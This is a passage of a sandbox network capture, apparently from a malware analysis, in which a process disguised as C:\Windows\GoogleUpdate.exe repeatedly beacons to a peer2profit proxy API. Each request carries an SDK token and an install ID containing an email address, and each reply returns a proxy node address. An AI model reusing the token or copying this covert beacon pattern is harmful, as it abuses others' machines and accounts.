"ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:38 UTC	2564	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:38 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e30d3c6f91d1-FRA
2022-11-26 10:19:38 UTC	2564	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
142	192.168.2.5	50129	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:38 UTC	2564	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:38 UTC	2564	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:38 UTC	2564	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:38 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e30efe14927a-FRA
2022-11-26 10:19:38 UTC	2564	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
143	192.168.2.5	50132	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:38 UTC	2565	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:38 UTC	2565	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:39 UTC	2565	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:39 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e310cb9891f0-FRA
2022-11-26 10:19:39 UTC	2565	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
144	192.168.2.5	50135	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:39 UTC	2565	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:39 UTC	2565	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:39 UTC	2566	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:39 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e31299c9bb85-FRA
2022-11-26 10:19:39 UTC	2566	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
145	192.168.2.5	50139	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:39 UTC	2566	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:39 UTC	2566	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:39 UTC	2566	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:39 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e3145e30bb49-FRA
2022-11-26 10:19:39 UTC	2567	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
146	192.168.2.5	50141	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:39 UTC	2567	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:39 UTC	2567	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:39 UTC	2567	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:39 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e3160935693f-FRA
2022-11-26 10:19:39 UTC	2567	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
147	192.168.2.5	50144	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:40 UTC	2567	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:40 UTC	2568	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:40 UTC	2568	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:40 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e317fbce908e-FRA
2022-11-26 10:19:40 UTC	2568	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
148	192.168.2.5	50147	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:40 UTC	2568	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:40 UTC	2568	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:40 UTC	2568	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:40 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e319d8529a33-FRA
2022-11-26 10:19:40 UTC	2569	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
149	192.168.2.5	50149	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:40 UTC	2569	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:40 UTC	2569	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:40 UTC	2569	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:40 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e31babc36977-FRA
2022-11-26 10:19:40 UTC	2569	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49753	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:24 UTC	2476	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:24 UTC	2477	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:24 UTC	2477	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:24 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e13d6bc89174-FRA
2022-11-26 10:18:24 UTC	2477	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
150	192.168.2.5	50152	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:40 UTC	2569	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:40 UTC	2570	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:41 UTC	2570	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:41 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e31d79d79c00-FRA
2022-11-26 10:19:41 UTC	2570	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
151	192.168.2.5	50155	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:41 UTC	2570	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:41 UTC	2570	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:41 UTC	2570	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:41 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e31f1b039baa-FRA
2022-11-26 10:19:41 UTC	2571	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
152	192.168.2.5	50157	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
